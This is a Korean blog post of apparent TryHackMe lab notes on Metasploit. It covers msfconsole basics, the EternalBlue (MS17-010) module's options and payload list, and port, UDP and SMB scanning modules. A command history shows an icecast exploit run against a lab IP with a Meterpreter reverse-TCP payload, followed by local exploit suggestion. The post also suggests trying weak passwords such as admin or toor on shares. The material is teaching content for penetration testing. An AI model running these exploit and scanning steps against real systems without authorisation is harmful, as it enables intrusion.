1. Command
msfconsole
┌──(root💀kali)-[/opt/metasploit]
└─# msfconsole 1 ⨯
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
https://metasploit.com
=[ metasploit v6.1.20-dev ]
+ -- --=[ 2186 exploits - 1159 auxiliary - 399 post ]
+ -- --=[ 595 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View advanced module options with
advancedping
Google DNS IP(8.8.8.8)로 보내기
msf6 > ping -c 1 8.8.8.8
[*] exec: ping -c 1 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=128 time=58.8 ms
--- 8.8.8.8 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 58.805/58.805/58.805/0.000 msset
msf6 > help set
Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's
datastore. Use -g to operate on the global datastore.
If setting a PAYLOAD, this command can take an index from `show payloads'.history
msf6 > history
1 exit
2 msfconsole -h
3 db_status
4 help
5 db_nmap -sV MACHINE_IP
6 db_nmap -sV 10.10.51.161
7 hosts
8 services
9 vulns
10 use icecast
11 search multi/handler
12 use NUMBER_NEXT_TO exploit/multi/handler
13 use 6
14 use 6 exploit/multi/handler
15 use 6
16 use6
17 use 4
18 search multi/handler
19 use 6
20 use NUMBER_FROM_PREVIOUS_QUESTION
21 back
22 use NUMBER_FROM_PREVIOUS_QUESTION
23 set PAYLOAD windows/meterpreter/reverse_tcp
24 set LHOST YOUR_IP_ON_TRYHACKME
25 set LHOST 10.8.31.30
26 use icecast
27 set RHOSTS 10.10.51.161
28 run -j
29 jobs
30 exploit
31 job
32 jobs
33 run
34 set lhost 10.8.31.30
35 run
36 jobs
37 session -i 1
38 sessions -i 1
39 run
40 run post/multi/recon/local_exploit_suggeste
41 set rhosts 10.10.51.161
42 set lhost 10.8.31.30
43 run post/multi/recon/local_exploit_suggeste
44 run
45 set rhosts 10.10.51.161
46 run
47 back
48 use icecast
49 set rhosts 10.10.51.161
50 set lhost 10.8.31.30
51 run
52 s
53 ls
54 ping -c 1 8.8.8.8
55 help setmsfconsole은 컨텍스트로 관리된다. 즉 전역 변수로 설정하지 않으면 사용하기로 결정한 모듈을 변경하면 모든 매개변수 설정이 손실된다. 아래 예에서는 ms17_010_eternalblue 익스플로잇을 사용했으며 다른 모듈(예: 포트 스캐너)로 전환하는 경우 변경한 모든 사항이 ms17_010_eternalblue 익스플로잇 컨텍스트에 남아 있으므로 RHOSTS 값을 다시 설정해야한다.
EternalBlue는 수많은 Windows 시스템의 SMBv1 서버에 영향을 미치는 취약점에 대해 미국 NSA에서 개발한 것으로 알려진 익스플로잇이다. SMB는 Windows 네트워크에서 파일 공유 및 프린터로 파일 전송에 널리 사용된다. EternalBlue는 Shadow Brokers에 의해 유출되었다. 이 취약점은 WannaCry 랜섬웨어 공격에서 전 세계적으로 악용되었다.
show options 명령은 사용되는 컨텍스트에 따라 다른 출력을 갖는다. 아래 예에선 RHOSTS, RPORT, VERFY_ARCH, VERIFY_TARGET의 변수를 설정해야함을 보여준다. 반면 공격 후 모듈은 SESSION ID만 설정하면 된다. 세션은 공격 후 모듈이 사용할 대상 시스템에 대한 기존 연결이다.
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windo
ws Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows E
mbedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded St
andard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.254.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
show
show명령은 사용가능한 모듈을 나열하기 위해 모듈 유형(auxiliary, payload, exploit 등)이 뒤따르는 모든 컨텍스트에서 사용할 수 있다.
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/windows/x64/exec normal No Windows x64 Execute Command
4 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
5 payload/windows/x64/messagebox normal No Windows MessageBox x64
6 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
7 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
8 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
9 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
10 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
11 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
12 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
13 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
14 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
15 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
16 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
17 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
18 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
19 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
20 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
21 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
22 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
23 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
24 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
25 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
26 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
27 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
28 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
29 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
30 payload/windows/x64/pingback_reverse_tcp normal No Windows x64 Pingback, Reverse TCP Inline
31 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
32 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
33 payload/windows/x64/powershell_reverse_tcp_ssl normal No Windows Interactive Powershell Session, Reverse TCP SSL
34 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
35 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
36 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
37 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
38 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
39 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
40 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
41 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
42 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
43 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
44 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
45 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
46 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
47 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
48 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
49 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
50 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
51 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
52 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
53 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
54 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
55 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
56 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
57 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)back
컨텍스트를 떠날 수 있다.
msf6 exploit(windows/smb/ms17_010_eternalblue) > back
msf6 >info
모든 모듈에 대한 추가 정보는 컨텍스트 내에서 info 명령으로 얻을 수 있다.
Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Module: exploit/windows/smb/ms17_010_eternalblue
Platform: Windows
Arch: x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2017-03-14
Provided by:
Equation Group
Shadow Brokers
sleepya
Sean Dillon <sean.dillon@risksense.com>
Dylan Davis <dylan.davis@risksense.com>
thelightcosine
wvu <wvu@metasploit.com>
agalway-r7
cdelafuente-r7
cdelafuente-r7
agalway-r7
Available targets:
Id Name
-- ----
0 Automatic Target
1 Windows 7
2 Windows Embedded Standard 7
3 Windows Server 2008 R2
4 Windows 8
5 Windows 8.1
6 Windows Server 2012
7 Windows 10 Pro
8 Windows 10 Enterprise Evaluation
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Window
s Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Em
bedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Sta
ndard 7 target machines.
Payload information:
Space: 2000
Description:
This module is a port of the Equation Group ETERNALBLUE exploit,
part of the FuzzBunch toolkit released by Shadow Brokers. There is a
buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is
calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error
where a DWORD is subtracted into a WORD. The kernel pool is groomed
so that overflow is well laid-out to overwrite an SMBv1 buffer.
Actual RIP hijack is later completed in
srvnet!SrvNetWskReceiveComplete. This exploit, like the original may
not trigger 100% of the time, and should be run continuously until
triggered. It seems like the pool will get hot streaks and need a
cool down period before the shells rain in again. The module will
attempt to use Anonymous login, by default, to authenticate to
perform the exploit. If the user supplies credentials in the
SMBUser, SMBPass, and SMBDomain options it will use those instead.
On some systems, this module may cause system instability and
crashes, such as a BSOD or a reboot. This may be more likely with
some payloads.
References:
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
https://nvd.nist.gov/vuln/detail/CVE-2017-0143
https://nvd.nist.gov/vuln/detail/CVE-2017-0144
https://nvd.nist.gov/vuln/detail/CVE-2017-0145
https://nvd.nist.gov/vuln/detail/CVE-2017-0146
https://nvd.nist.gov/vuln/detail/CVE-2017-0147
https://nvd.nist.gov/vuln/detail/CVE-2017-0148
https://github.com/RiskSense-Ops/MS17-010
https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf
https://www.exploit-db.com/exploits/42030
Also known as:
ETERNALBLUESearch
CVE 번호, 익스플로잇 이름(eternalblue, heartbleed 등), 대상 시스템을 사용하여 검색을 수행할 수 있다.
2. Scanning
포트 스캐닝
Metasploit에는 대상 시스템 및 네트워크의 열린 포트를 스캔하는 여러 모듈이 있다.
msf6 > search portscan
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
3 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
4 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
7 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access포트 스캐닝 모듈을 사용하려면 몇가지 옵션을 설정해야 한다.
msf6 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds- CONCURRENCY: 동시에 스캔할 대상의 수
- PORTS: 스캔할 포트 범위. 1-10000은 기본 구성으로 Nmap과 다르다. Nmap 은 가장 많이 사용되는 1000개의 포트를 스캔하고 Metasploit은 1-10000까지의 포트 번호를 스캔한다.
- RHOSTS: 스캔할 대상 또는 대상 네트워크
- THREADS: 동시에 사용될 스레드 수. 스레드가 많을 수록 스캔속도가 빨라진다.
UDP 서비스 식별
scanner/discovery/udp_sweep 모듈을 사용하면 UDP(User Datagram Protocol)를 통해 실행되는 서비스를 빠르게 식별할 수 있다.
msf6 auxiliary(scanner/discovery/udp_sweep) > run
[*] Sending 13 probes to 10.10.61.253->10.10.61.253 (1 hosts)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
SMB 스캔
Metasploit은 특정 서비스를 스캔할 수 있는 몇가지 유용한 보조 모듈을 제공한다. 다음은 SMB의 예이다. (회사 네트워크에서 유용한 예는 smb_enumshares, smb_version이지만 시스템에 설치된 Metasploit 버전에서 제공하는 스캐너를 확인하는 데 시간을 투자하라)
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.10.61.253:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{312d7069-2d30-3031-2d36-312d32353300}) (authentication domain:IP-10-10-61-253)
[*] 10.10.61.253:445 - Host could not be identified: Windows 6.1 (Samba 4.7.6-Ubuntu)
[*] 10.10.61.253: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
서비스 스캔을 수행할 때 NetBIOS와 같은 특이한 서비스를 생략하지 않는 것이 중요하다. SMB와 유사한 NetBIOS(Network Basic Input Output System)를 사용하면 컴퓨터가 네트워크를 통해 통신하여 파일을 공유하거나 파일을 프린터로 보낼 수 있다. 대상 시스템의 NetBIOS 이름은 그 역할과 중요성(예: CORP-DC, DEVOPS, SALES 등)에 대한 아이디어를 제공할 수 있다. 또한 암호 없이 액세스하거나 간단한 암호(예: admin, administrator, root, toor 등)로 보호할 수 있는 일부 공유 파일 및 폴더에서 실행할 수 있다.
'네트워크 보안 > 보안' 카테고리의 다른 글
| [Pentesting] Nmap 라이브 호스트 검색 (0) | 2021.12.29 |
|---|---|
| Wireshark 🦈 (0) | 2021.12.28 |
| [Pentesting] MetaSploit (00) (0) | 2021.12.27 |
| [Contents] Google Dorking (0) | 2021.12.27 |
| [Pentesting] Burp Suite 설치하고 Openvpn 설정 (0) | 2021.12.26 |